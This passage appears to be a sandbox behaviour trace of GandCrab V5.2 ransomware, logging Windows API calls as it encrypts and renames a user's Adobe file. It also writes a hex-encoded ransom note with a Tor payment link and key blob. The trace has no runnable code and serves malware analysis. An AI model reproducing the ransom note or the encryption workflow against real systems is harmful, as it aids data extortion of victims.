"c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\addressbook.acrodata"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0069.395] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.395] ReadFile (in: hFile=0x2d4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0069.396] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.396] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0069.397] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.397] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.397] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.397] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0069.397] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.397] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.397] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.398] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.398] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0069.398] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.398] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.398] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.398] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0069.398] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.399] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.399] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.399] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.399] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0069.399] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.399] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503938) returned 1 [0069.399] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.400] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0069.400] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.400] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0069.400] GetLastError () returned 0x0 [0069.400] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.400] CryptDestroyKey (hKey=0x503938) returned 1 [0069.400] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.400] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.400] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.400] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0069.401] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.401] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503478) returned 1 [0069.401] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.401] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0069.401] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.401] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0069.402] GetLastError () returned 0x0 [0069.402] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.402] CryptDestroyKey (hKey=0x503478) returned 1 [0069.402] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.402] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.402] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0069.402] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0069.402] ReadFile (in: hFile=0x2d4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259e78c*=0x2a8f, lpOverlapped=0x0) returned 1 [0069.408] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xffffd571, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.408] WriteFile (in: hFile=0x2d4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x2a8f, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259e770*=0x2a8f, lpOverlapped=0x0) returned 1 [0069.410] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.410] WriteFile (in: hFile=0x2d4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0069.411] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.415] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.415] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.415] CloseHandle (hObject=0x2d4) returned 1 [0069.418] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\addressbook.acrodata"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\addressbook.acrodata.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\addressbook.acrodata.titwmvjl"), dwFlags=0x1) returned 1 [0069.418] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.419] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0069.419] lstrcmpW (lpString1="CRLCache", lpString2=".") returned 1 [0069.419] lstrcmpW (lpString1="CRLCache", lpString2="..") returned 1 [0069.419] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\", lpString2="CRLCache" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache" [0069.419] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\" [0069.419] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0069.419] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.419] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0069.419] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.419] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0069.419] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.420] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0069.420] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.420] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.420] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.420] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.420] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\\\TITWMVJL-DECRYPT.txt") returned 94 [0069.420] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0069.422] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x